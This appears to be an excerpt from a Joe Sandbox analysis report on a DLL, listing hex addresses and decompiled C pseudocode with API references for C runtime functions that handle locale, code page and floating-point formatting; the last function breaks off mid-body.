              0x00000000
              0x00000000
              0x6da9dc8d
              0x6da9dc8f
              0x6da9dc91
              0x6da9dc99
              0x6da9dc9c
              0x6da9dc9c
              0x6da9dc9e
              0x6da9dc9e
              0x6da9dcaa
              0x6da9dcad
              0x6da9dcb3
              0x6da9dcc2
              0x6da9dcc5
              0x6da9dccc
              0x6da9dcd2
              0x6da9dcd5
              0x6da9dcd6
              0x6da9dcd7
              0x6da9dcdd
              0x6da9dce3
              0x6da9dce9
              0x00000000
              0x00000000
              0x00000000
              0x6da9dce9
              0x6da9dceb
              0x6da9dced
              0x6da9dcf5
              0x6da9dcf8
              0x6da9dcfe
              0x6da9dcfe
              0x6da9dd01
              0x00000000
              0x00000000
              0x6da9dd03
              0x6da9dd05
              0x6da9dd07
              0x6da9dd07
              0x6da9dd0a
              0x6da9dd0d
              0x6da9dd0d
              0x6da9dd13
              0x6da9dd1a
              0x6da9dd1c
              0x6da9dd1d
              0x6da9dd1f
              0x6da9dd1f
              0x6da9dd21
              0x6da9dd27
              0x6da9dd29
              0x6da9dd2b
              0x00000000
              0x6da9dd2b
              0x00000000
              0x6da9dd29
              0x6da9dcfe
              0x6da9dd33
              0x6da9dd33
              0x6da9dd33
              0x6da9dd39
              0x6da9dd3c
              0x6da9de25
              0x00000000
              0x6da9dd42
              0x6da9dd42
              0x00000000
              0x6da9dd42
              0x6da9dc4c
              0x6da9dc4c
              0x6da9dc4e
              0x6da9dc54
              0x6da9dc5c
              0x6da9dc5c
              0x6da9dc5f
              0x6da9dc5f
              0x00000000
              0x6da9dc4e
              0x00000000
              0x6da9dd48
              0x6da9dd48
              0x6da9dd49
              0x6da9dd49
              0x00000000
              0x6da9dc46
              0x6da9db17
              0x6da9db17
              0x6da9db22
              0x6da9db2e
              0x6da9db3b
              0x6da9db43
              0x6da9db48
              0x6da9db4b
              0x6da9db4d
              0x6da9db69
              0x6da9db6b
              0x00000000
              0x6da9db71
              0x6da9db71
              0x6da9db78
              0x00000000
              0x6da9db7e
              0x6da9db84
              0x6da9db86
              0x6da9db8c
              0x6da9db8c
              0x6da9db8e
              0x6da9db8e
              0x6da9db94
              0x6da9db9d
              0x6da9dba4
              0x6da9dba7
              0x6da9dba8
              0x6da9dbaa
              0x6da9dbaa
              0x6da9dbb2
              0x6da9dbb4
              0x00000000
              0x6da9dbba
              0x6da9dbba
              0x6da9dbc0
              0x6da9dbc3
              0x6da9de2a
              0x6da9de2d
              0x6da9de33
              0x6da9de48
              0x6da9de4d
              0x6da9de50
              0x6da9dbc9
              0x6da9dbc9
              0x6da9dbd0
              0x00000000
              0x6da9dbd0
              0x6da9dbc3
              0x6da9dbb4
              0x6da9db78
              0x6da9db4f
              0x6da9db51
              0x6da9db57
              0x6da9db5d
              0x6da9db5e
              0x6da9dd66
              0x6da9dd66
              0x6da9dd6d
              0x6da9dd6e
              0x6da9dd6f
              0x6da9dd74
              0x6da9dd77
              0x6da9dd77
              0x6da9dd77
              0x6da9db4d
              0x6da9da3f
              0x6da9da3f
              0x6da9da45
              0x6da9da47
              0x6da9da7f
              0x6da9da81
              0x00000000
              0x6da9da83
              0x6da9da83
              0x6da9da8a
              0x00000000
              0x6da9da8c
              0x6da9da92
              0x6da9da94
              0x6da9da9a
              0x6da9da9a
              0x6da9da9c
              0x6da9da9c
              0x6da9da9e
              0x6da9daa7
              0x6da9daae
              0x6da9dab1
              0x6da9dab2
              0x6da9dab4
              0x6da9dab4
              0x6da9dabc
              0x6da9dabe
              0x00000000
              0x6da9dac0
              0x6da9dac0
              0x6da9dac6
              0x6da9dac9
              0x6da9dadd
              0x6da9dae3
              0x6da9dafc
              0x6da9db01
              0x6da9db04
              0x00000000
              0x6da9dacb
              0x6da9dacb
              0x6da9dad2
              0x00000000
              0x6da9dad2
              0x6da9dac9
              0x6da9dabe
              0x6da9da8a
              0x00000000
              0x6da9da49
              0x6da9da49
              0x6da9da4c
              0x6da9da52
              0x6da9da6b
              0x6da9da70
              0x6da9da73
              0x6da9da73
              0x6da9da73
              0x6da9da75
              0x6da9da75
              0x6da9da75
              0x6da9dd79
              0x6da9dd79
              0x6da9dd7b
              0x6da9de57
              0x6da9de5e
              0x6da9de65
              0x6da9de78
              0x6da9de7e
              0x6da9de7f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da9dd81
              0x6da9dd87
              0x6da9dd87
              0x6da9dd8d
              0x6da9dd8d
              0x6da9dd99
              0x00000000
              0x6da9dd99
              0x6da9d4b1
              0x6da9d4b1
              0x6da9d4b3
              0x6da9d4b9
              0x6da9d4bb
              0x6da9d4c1
              0x6da9d4c3
              0x6da9d8be
              0x6da9d8be
              0x6da9d8c0
              0x6da9d8c6
              0x6da9d8cd
              0x6da9d8d3
              0x6da9d8d5
              0x6da9d939
              0x6da9d93b
              0x6da9d941
              0x6da9d947
              0x6da9d949
              0x6da9d94f
              0x6da9d956
              0x6da9d956
              0x6da9d958
              0x6da9d958
              0x6da9d965
              0x6da9d96c
              0x6da9d972
              0x6da9d975
              0x6da9d976
              0x6da9d97c
              0x6da9d97c
              0x6da9d980
              0x6da9d982
              0x6da9d988
              0x6da9d98e
              0x6da9d991
              0x00000000
              0x6da9d997
              0x6da9d997
              0x6da9d99e
              0x6da9d99e
              0x6da9d991
              0x6da9d982
              0x6da9d949
              0x6da9d8d7
              0x6da9d8d7
              0x6da9d8d9
              0x6da9d8df
              0x6da9d8e5
              0x00000000
              0x6da9d8e5
              0x6da9d8d5
              0x6da9d4c9
              0x6da9d4c9
              0x6da9d4c9
              0x6da9d4cc
              0x6da9d4d0
              0x6da9d4d0
              0x6da9d4d1
              0x6da9d4e3
              0x6da9d4f0
              0x6da9d4ff
              0x6da9d529
              0x6da9d52e
              0x6da9d534
              0x6da9d537
              0x6da9d53d
              0x6da9d53f
              0x6da9d611
              0x6da9d617
              0x6da9d6f7
              0x6da9d6fd
              0x6da9d703
              0x6da9d703
              0x6da9d703
              0x6da9d706
              0x6da9d708
              0x6da9d708
              0x6da9d70e
              0x6da9d714
              0x6da9d716
              0x6da9d732
              0x6da9d73e
              0x6da9d744
              0x6da9d74a
              0x6da9d718
              0x6da9d71e
              0x6da9d72a
              0x6da9d72a
              0x6da9d750
              0x6da9d752
              0x6da9d754
              0x6da9d75a
              0x6da9d75c
              0x6da9d874
              0x6da9d874
              0x6da9d87a
              0x6da9d87f
              0x6da9d87f
              0x6da9d882
              0x6da9d883
              0x00000000
              0x6da9d762
              0x6da9d762
              0x6da9d762
              0x6da9d766
              0x6da9d786
              0x6da9d788
              0x6da9d78a
              0x6da9d790
              0x6da9d796
              0x6da9d79c
              0x6da9d7a2
              0x6da9d7a4
              0x6da9d7a4
              0x6da9d7a7
              0x00000000
              0x00000000
              0x6da9d7a9
              0x6da9d7ab
              0x6da9d7ad
              0x6da9d7b5
              0x6da9d7b8
              0x6da9d7b8
              0x6da9d7ba
              0x6da9d7ba
              0x6da9d7c6
              0x6da9d7c9
              0x6da9d7cf
              0x6da9d7df
              0x6da9d7e8
              0x6da9d7ef
              0x6da9d7f5
              0x6da9d7f8
              0x6da9d7f9
              0x6da9d7ff
              0x6da9d800
              0x6da9d806
              0x6da9d80c
              0x00000000
              0x00000000
              0x00000000
              0x6da9d80c
              0x6da9d80e
              0x6da9d810
              0x6da9d818
              0x6da9d81b
              0x6da9d821
              0x6da9d821
              0x6da9d824
              0x00000000
              0x00000000
              0x6da9d826
              0x6da9d828
              0x6da9d82a
              0x6da9d82a
              0x6da9d82d
              0x6da9d830
              0x6da9d830
              0x6da9d836
              0x6da9d83d
              0x6da9d83f
              0x6da9d840
              0x6da9d842
              0x6da9d842
              0x6da9d844
              0x6da9d84a
              0x6da9d84c
              0x6da9d84e
              0x00000000
              0x6da9d84e
              0x00000000
              0x6da9d84c
              0x6da9d821
              0x6da9d856
              0x6da9d856
              0x6da9d856
              0x6da9d85c
              0x6da9d85f
              0x6da9d8e8
              0x6da9d8ea
              0x6da9d8ef
              0x6da9d8f5
              0x6da9d8fb
              0x6da9d8fc
              0x00000000
              0x6da9d865
              0x6da9d865
              0x00000000
              0x6da9d865
              0x6da9d768
              0x6da9d768
              0x6da9d76a
              0x6da9d770
              0x6da9d778
              0x6da9d778
              0x6da9d77b
              0x6da9d77b
              0x00000000
              0x6da9d76a
              0x00000000
              0x6da9d86b
              0x6da9d86b
              0x6da9d86c
              0x6da9d86c
              0x00000000
              0x6da9d762
              0x6da9d61d
              0x6da9d61d
              0x6da9d628
              0x6da9d634
              0x6da9d641
              0x6da9d649
              0x6da9d64e
              0x6da9d651
              0x6da9d653
              0x6da9d66f
              0x6da9d671
              0x00000000
              0x6da9d677
              0x6da9d677
              0x6da9d67e
              0x00000000
              0x6da9d684
              0x6da9d68a
              0x6da9d68c
              0x6da9d692
              0x6da9d692
              0x6da9d694
              0x6da9d694
              0x6da9d69a
              0x6da9d6a3
              0x6da9d6aa
              0x6da9d6ad
              0x6da9d6ae
              0x6da9d6b0
              0x6da9d6b0
              0x6da9d6b8
              0x6da9d6ba
              0x00000000
              0x6da9d6c0
              0x6da9d6c0
              0x6da9d6c6
              0x6da9d6c9
              0x6da9d6df
              0x6da9d6e5
              0x6da9d6eb
              0x6da9d6ec
              0x6da9d902
              0x6da9d902
              0x6da9d909
              0x6da9d90a
              0x6da9d90b
              0x6da9d910
              0x6da9d913
              0x6da9d6cb
              0x6da9d6cb
              0x6da9d6d2
              0x00000000
              0x6da9d6d2
              0x6da9d6c9
              0x6da9d6ba
              0x6da9d67e
              0x6da9d655
              0x6da9d657
              0x6da9d65d
              0x6da9d663
              0x6da9d664
              0x6da9d889
              0x6da9d889
              0x6da9d890
              0x6da9d891
              0x6da9d892
              0x6da9d897
              0x6da9d89a
              0x6da9d89a
              0x6da9d89a
              0x6da9d653
              0x6da9d545
              0x6da9d545
              0x6da9d54b
              0x6da9d54d
              0x6da9d585
              0x6da9d587
              0x00000000
              0x6da9d589
              0x6da9d589
              0x6da9d590
              0x00000000
              0x6da9d592
              0x6da9d598
              0x6da9d59a
              0x6da9d5a0
              0x6da9d5a0
              0x6da9d5a2
              0x6da9d5a2
              0x6da9d5a4
              0x6da9d5ad
              0x6da9d5b4
              0x6da9d5b7
              0x6da9d5b8
              0x6da9d5ba
              0x6da9d5ba
              0x6da9d5c2
              0x6da9d5c4
              0x00000000
              0x6da9d5c6
              0x6da9d5c6
              0x6da9d5cc
              0x6da9d5cf
              0x6da9d5e3
              0x6da9d5e9
              0x6da9d602
              0x6da9d607
              0x6da9d60a
              0x00000000
              0x6da9d5d1
              0x6da9d5d1
              0x6da9d5d8
              0x00000000
              0x6da9d5d8
              0x6da9d5cf
              0x6da9d5c4
              0x6da9d590
              0x00000000
              0x6da9d54f
              0x6da9d54f
              0x6da9d552
              0x6da9d558
              0x6da9d571
              0x6da9d576
              0x6da9d579
              0x6da9d579
              0x6da9d579
              0x6da9d57b
              0x6da9d57b
              0x6da9d57b
              0x6da9d89c
              0x6da9d89c
              0x6da9d89e
              0x6da9d917
              0x6da9d91e
              0x6da9d91e
              0x6da9d91e
              0x6da9d925
              0x6da9d927
              0x6da9d92d
              0x6da9d92e
              0x6da9de85
              0x6da9de85
              0x6da9de86
              0x6da9de87
              0x6da9de8c
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da9d8a0
              0x6da9d8a6
              0x6da9d8a6
              0x6da9d8ac
              0x6da9d8ac
              0x6da9d8b8
              0x00000000
              0x6da9d8b8
              0x6da9d4c3
              0x6da9de8f
              0x6da9de8f
              0x6da9de95
              0x6da9de9b
              0x6da9dea1
              0x6da9dea3
              0x6da9dea5
              0x6da9deac
              0x6da9deac
              0x6da9deae
              0x6da9deae
              0x6da9deb7
              0x6da9deb8
              0x6da9dec0
              0x6da9dec7
              0x6da9deca
              0x6da9decb
              0x6da9ded1
              0x6da9ded1
              0x6da9ded5
              0x6da9dedb
              0x6da9dedd
              0x6da9dedf
              0x6da9dee5
              0x6da9dee8
              0x6da9def9
              0x6da9defc
              0x6da9df02
              0x6da9df17
              0x6da9df1c
              0x6da9deea
              0x6da9deea
              0x6da9def1
              0x6da9def1
              0x6da9dee8
              0x6da9dedd
              0x6da9df2d
              0x6da9df34
              0x6da9df3c
              0x6da9df3d
              0x6da9df3f
              0x6da9e0a9
              0x6da9e0ab
              0x6da9e0bb
              0x6da9e0be
              0x6da9e0c0
              0x00000000
              0x6da9e0ad
              0x6da9e0b3
              0x00000000
              0x6da9e0b3
              0x00000000
              0x6da9df45
              0x6da9df45
              0x6da9df4b
              0x6da9df4e
              0x6da9df54
              0x6da9df57
              0x6da9df5d
              0x6da9df63
              0x6da9df65
              0x6da9df67
              0x6da9df69
              0x6da9df69
              0x6da9df6b
              0x6da9df6b
              0x6da9df78
              0x6da9df7f
              0x6da9df82
              0x6da9df83
              0x6da9df85
              0x6da9df86
              0x6da9df86
              0x6da9df8e
              0x6da9df94
              0x6da9df96
              0x6da9df9c
              0x6da9df9e
              0x6da9dfa4
              0x6da9dfa7
              0x6da9e081
              0x6da9e087
              0x6da9e09c
              0x6da9e0a1
              0x6da9dfad
              0x6da9dfb3
              0x6da9dfba
              0x6da9dfba
              0x6da9dfba
              0x6da9dfba
              0x6da9dfa7
              0x6da9dfc0
              0x6da9dfc0
              0x6da9dfc6
              0x6da9dfc6
              0x6da9dfc6
              0x6da9dfcc
              0x6da9dfd2
              0x6da9dfd5
              0x6da9dfdb
              0x6da9dfdd
              0x6da9dfdf
              0x6da9dfe5
              0x6da9dfe7
              0x6da9dfeb
              0x6da9dfed
              0x6da9dfed
              0x6da9dfed
              0x6da9dfeb
              0x6da9dfe5
              0x6da9dff2
              0x6da9dff3
              0x6da9dff5
              0x6da9dff7
              0x6da9dff7
              0x6da9dff9
              0x6da9dffb
              0x6da9dffd
              0x6da9e003
              0x6da9e009
              0x6da9e00b
              0x6da9e011
              0x6da9e011
              0x6da9e017
              0x6da9e01d
              0x6da9e01f
              0x00000000
              0x00000000
              0x6da9e025
              0x6da9e027
              0x6da9e027
              0x6da9e029
              0x6da9e029
              0x6da9e035
              0x6da9e039
              0x6da9e040
              0x6da9e043
              0x6da9e044
              0x6da9e046
              0x6da9e046
              0x6da9e04e
              0x6da9e054
              0x6da9e056
              0x6da9e05c
              0x6da9e062
              0x6da9e068
              0x6da9e06b
              0x6da9e0cb
              0x6da9e0ce
              0x6da9e0d4
              0x6da9e0e9
              0x6da9e0ee
              0x6da9e06d
              0x6da9e06f
              0x6da9e076
              0x6da9e076
              0x6da9e06b
              0x6da9e0ff
              0x6da9e10c
              0x6da9e116
              0x6da9e116
              0x6da9e118
              0x6da9e120
              0x6da9e126
              0x6da9e129
              0x6da9e12f
              0x6da9e131
              0x6da9e142
              0x00000000
              0x6da9e133
              0x6da9e133
              0x6da9e136
              0x6da9e145
              0x6da9e145
              0x6da9e138
              0x6da9e138
              0x6da9e13a
              0x6da9e13a
              0x6da9e136
              0x6da9e14b
              0x6da9e14c
              0x6da9e152
              0x6da9e155
              0x6da9e155
              0x6da9e15d
              0x6da9e160
              0x6da9e164
              0x6da9e164
              0x6da9e165
              0x6da9e167
              0x6da9e16d
              0x6da9e173
              0x00000000
              0x00000000
              0x00000000
              0x6da9e173
              0x6da9e011
              0x6da9e179
              0x6da9e179
              0x6da9e17c
              0x6da9e183
              0x00000000
              0x6da9e185

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: __floor_pentium4
              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
              • API String ID: 4168288129-2761157908
              • Opcode ID: e67f88d44ff431c98a083526c366089bd7772a999efef0b2581b49ad3df07d0e
              • Instruction ID: 74582ce8dc7acc0679e0aa4e62605b5093e09af185833da7a371884e5569ad05
              • Opcode Fuzzy Hash: e67f88d44ff431c98a083526c366089bd7772a999efef0b2581b49ad3df07d0e
              • Instruction Fuzzy Hash: 49D21776E196298FDF658E28CD407EAB7F5EB85344F1445EAD40DAB240E738AAC1CF40
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 96%
              			E6DA9C73D(void* __ecx, signed int _a4, intOrPtr _a8) {
              				short _v8;
              				short _t17;
              				signed int _t18;
              				signed int _t23;
              				signed int _t25;
              				signed int _t26;
              				signed int _t27;
              				void* _t30;
              				void* _t31;
              				intOrPtr _t32;
              				intOrPtr _t33;
              				intOrPtr* _t36;
              				intOrPtr* _t37;
              
              				_t23 = _a4;
              				if(_t23 == 0) {
              					L21:
              					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
              						_t17 = _v8;
              						if(_t17 == 0) {
              							_t17 = GetACP();
              						}
              						L25:
              						return _t17;
              					}
              					L22:
              					_t17 = 0;
              					goto L25;
              				}
              				_t18 = 0;
              				if( *_t23 == 0) {
              					goto L21;
              				}
              				_t36 = L"ACP";
              				_t25 = _t23;
              				while(1) {
              					_t30 =  *_t25;
              					if(_t30 !=  *_t36) {
              						break;
              					}
              					if(_t30 == 0) {
              						L7:
              						_t26 = _t18;
              						L9:
              						if(_t26 == 0) {
              							goto L21;
              						}
              						_t37 = L"OCP";
              						_t27 = _t23;
              						while(1) {
              							_t31 =  *_t27;
              							if(_t31 !=  *_t37) {
              								break;
              							}
              							if(_t31 == 0) {
              								L17:
              								if(_t18 != 0) {
              									_t17 = E6DA92774(_t27, _t23);
              									goto L25;
              								}
              								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
              									goto L22;
              								}
              								_t17 = _v8;
              								goto L25;
              							}
              							_t32 =  *((intOrPtr*)(_t27 + 2));
              							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
              								break;
              							}
              							_t27 = _t27 + 4;
              							_t37 = _t37 + 4;
              							if(_t32 != 0) {
              								continue;
              							}
              							goto L17;
              						}
              						asm("sbb eax, eax");
              						_t18 = _t18 | 0x00000001;
              						goto L17;
              					}
              					_t33 =  *((intOrPtr*)(_t25 + 2));
              					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
              						break;
              					}
              					_t25 = _t25 + 4;
              					_t36 = _t36 + 4;
              					if(_t33 != 0) {
              						continue;
              					}
              					goto L7;
              				}
              				asm("sbb edx, edx");
              				_t26 = _t25 | 0x00000001;
              				goto L9;
              			}

















              APIs
              • GetLocaleInfoW.KERNEL32(00000000,2000000B,6DA9CA5B,00000002,00000000,?,?,?,6DA9CA5B,?,00000000), ref: 6DA9C7D6
              • GetLocaleInfoW.KERNEL32(00000000,20001004,6DA9CA5B,00000002,00000000,?,?,?,6DA9CA5B,?,00000000), ref: 6DA9C7FF
              • GetACP.KERNEL32(?,?,6DA9CA5B,?,00000000), ref: 6DA9C814
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: InfoLocale
              • String ID: ACP$OCP
              • API String ID: 2299586839-711371036
              • Opcode ID: 65f8e91afbccde69cf97e256e581837170e1186939203c796b38e11e27c7e95b
              • Instruction ID: 83792b95ed9eb925378245d3cc80f659943d758700c7cf6d111bf17917866b1a
              • Opcode Fuzzy Hash: 65f8e91afbccde69cf97e256e581837170e1186939203c796b38e11e27c7e95b
              • Instruction Fuzzy Hash: D621903A66CA02ABE7258F64C940A9772F6BB44B94B1AC524F90ADF100E732DAC0C350
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 87%
              			E6DA9C912(void* __ecx, void* __edx, signed short _a4, signed short* _a8, short* _a12) {
              				signed int _v8;
              				int _v12;
              				int _v16;
              				char _v20;
              				signed short* _v24;
              				signed short* _v28;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				signed int _t39;
              				void* _t45;
              				signed short* _t46;
              				signed short _t47;
              				signed short _t48;
              				int _t49;
              				void* _t53;
              				signed short* _t57;
              				signed short _t70;
              				intOrPtr _t73;
              				void* _t75;
              				signed short _t76;
              				intOrPtr _t83;
              				short* _t86;
              				signed short _t89;
              				signed short* _t99;
              				void* _t100;
              				signed short _t101;
              				signed int _t104;
              				void* _t105;
              
              				_t39 =  *0x6dab3014; // 0x6c4e8ceb
              				_v8 = _t39 ^ _t104;
              				_t86 = _a12;
              				_t101 = _a4;
              				_v28 = _a8;
              				_v24 = E6DA92BDC(__ecx, __edx, _t101) + 0x50;
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				_t45 = E6DA92BDC(__ecx, __edx, _t101);
              				_t97 = 0;
              				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
              				_t89 = _t101 + 0x80;
              				_t46 = _v24;
              				 *_t46 = _t101;
              				_t99 =  &(_t46[2]);
              				 *_t99 = _t89;
              				if(_t89 != 0 &&  *_t89 != 0) {
              					_t83 =  *0x6daa8574; // 0x17
              					E6DA9C8B1(_t89, 0, 0x6daa8460, _t83 - 1, _t99);
              					_t46 = _v24;
              					_t105 = _t105 + 0xc;
              					_t97 = 0;
              				}
              				_v20 = _t97;
              				_t47 =  *_t46;
              				if(_t47 == 0 ||  *_t47 == _t97) {
              					_t48 =  *_t99;
              					if(_t48 == 0 ||  *_t48 == _t97) {
              						_v20 = 0x104;
              						_t49 = GetUserDefaultLCID();
              						_v12 = _t49;
              						_v16 = _t49;
              					} else {
              						E6DA9C250(_t89, _t97,  &_v20);
              						_pop(_t89);
              					}
              					goto L20;
              				} else {
              					_t70 =  *_t99;
              					if(_t70 == 0 ||  *_t70 == _t97) {
              						E6DA9C336(_t89, _t97,  &_v20);
              					} else {
              						E6DA9C29B(_t89, _t97,  &_v20);
              					}
              					_pop(_t89);
              					if(_v20 != 0) {
              						_t100 = 0;
              						goto L25;
              					} else {
              						_t73 =  *0x6daa845c; // 0x41
              						_t75 = E6DA9C8B1(_t89, _t97, 0x6daa8150, _t73 - 1, _v24);
              						_t105 = _t105 + 0xc;
              						if(_t75 == 0) {
              							L20:
              							_t100 = 0;
              							L21:
              							if(_v20 != 0) {
              								L25:
              								asm("sbb esi, esi");
              								_t101 = E6DA9C73D(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
              								if(_t101 == 0 || IsValidCodePage(_t101 & 0x0000ffff) == 0 || IsValidLocale(_v16, 1) == 0) {
              									goto L22;
              								} else {
              									_t57 = _v28;
              									if(_t57 != 0) {
              										 *_t57 = _t101;
              									}
              									E6DA96910(_v16,  &(_v24[0x128]), 0x55, _t100);
              									if(_t86 == 0) {
              										L34:
              										_t53 = 1;
              										L23:
              										return E6DA89B91(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
              									} else {
              										_t33 =  &(_t86[0x90]); // 0xd0
              										E6DA96910(_v16, _t33, 0x55, _t100);
              										if(GetLocaleInfoW(_v16, 0x1001, _t86, 0x40) == 0) {
              											goto L22;
              										}
              										_t36 =  &(_t86[0x40]); // 0x30
              										if(GetLocaleInfoW(_v12, 0x1002, _t36, 0x40) == 0) {
              											goto L22;
              										}
              										_t38 =  &(_t86[0x80]); // 0xb0
              										E6DAA0752(_t38, _t101, _t38, 0x10, 0xa);
              										goto L34;
              									}
              								}
              							}
              							L22:
              							_t53 = 0;
              							goto L23;
              						}
              						_t76 =  *_t99;
              						_t100 = 0;
              						if(_t76 == 0 ||  *_t76 == 0) {
              							E6DA9C336(_t89, _t97,  &_v20);
              						} else {
              							E6DA9C29B(_t89, _t97,  &_v20);
              						}
              						_pop(_t89);
              						goto L21;
              					}
              				}
              			}


































              APIs
                • Part of subcall function 6DA92BDC: GetLastError.KERNEL32(?,00000008,6DA98ED9), ref: 6DA92BE0
                • Part of subcall function 6DA92BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA92C82
              • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6DA9CA1E
              • IsValidCodePage.KERNEL32(00000000), ref: 6DA9CA67
              • IsValidLocale.KERNEL32(?,00000001), ref: 6DA9CA76
              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6DA9CABE
              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6DA9CADD
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
              • String ID:
              • API String ID: 415426439-0
              • Opcode ID: 88a06d7284efc3732c150337697f4fdcc3dd615c8dbda605e7eaae20e9e64438
              • Instruction ID: 602d325dffe0d5b1bb08acc016771ec53985b93acf8d0031619129ca58d17666
              • Opcode Fuzzy Hash: 88a06d7284efc3732c150337697f4fdcc3dd615c8dbda605e7eaae20e9e64438
              • Instruction Fuzzy Hash: 52515075928A16AFEB00DFB5CC40ABE77F9BF09700F094529E510EF140EB70DA818B61
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 82%
              			E6DA948FC(signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
              				signed int _v5;
              				signed int _v12;
              				signed int _v16;
              				signed int _v20;
              				signed int _v24;
              				unsigned int _v28;
              				signed int _v32;
              				signed int _v36;
              				signed int _v40;
              				signed int _v48;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				signed char _t87;
              				void* _t93;
              				intOrPtr _t94;
              				signed int _t98;
              				signed int _t100;
              				signed int _t101;
              				signed int _t104;
              				signed int _t105;
              				signed int _t106;
              				signed int _t111;
              				void* _t113;
              				signed int _t114;
              				void* _t115;
              				void* _t118;
              				void* _t120;
              				void* _t122;
              				signed int* _t124;
              				void* _t127;
              				signed int _t129;
              				signed int _t131;
              				signed int _t136;
              				signed int* _t140;
              				signed int _t141;
              				signed int _t146;
              				signed int _t147;
              				signed int _t149;
              				signed int _t154;
              				signed int _t155;
              				signed int _t156;
              				signed int _t157;
              				void* _t161;
              				unsigned int _t162;
              				intOrPtr _t171;
              				signed int _t173;
              				signed int* _t174;
              				signed int _t176;
              				signed int _t177;
              				signed int _t178;
              				signed int _t183;
              				signed int _t184;
              				signed int _t185;
              				signed int _t186;
              				signed int _t188;
              				intOrPtr _t189;
              				void* _t190;
              
              				_t186 = _a24;
              				if(_t186 < 0) {
              					_t186 = 0;
              				}
              				_t183 = _a8;
              				_t3 = _t186 + 0xb; // 0xb
              				 *_t183 = 0;
              				if(_a12 > _t3) {
              					_t140 = _a4;
              					_t147 = _t140[1];
              					_t173 =  *_t140;
              					__eflags = (_t147 >> 0x00000014 & 0x000007ff) - 0x7ff;
              					if(__eflags != 0) {
              						__eflags = _t147;
              						if(__eflags > 0) {
              							L13:
              							_t20 = _t183 + 1; // 0x2
              							_t174 = _t20;
              							_t87 = _a28 ^ 0x00000001;
              							_v20 = 0x3ff;
              							_v5 = _t87;
              							_v16 = _t174;
              							_v48 = ((_t87 & 0x000000ff) << 5) + 7;
              							__eflags = _t147 & 0x7ff00000;
              							_t93 = 0x30;
              							if((_t147 & 0x7ff00000) != 0) {
              								 *_t183 = 0x31;
              								L18:
              								_t149 = 0;
              								__eflags = 0;
              								L19:
              								_t28 =  &(_t174[0]); // 0x2
              								_t184 = _t28;
              								__eflags = _t186;
              								if(_t186 != 0) {
              									_t94 = _a40;
              									__eflags =  *((char*)(_t94 + 0x14));
              									if(__eflags == 0) {
              										E6DA8F860(_t94, _t174, __eflags);
              										_t94 = _a40;
              										_t174 = _v16;
              									}
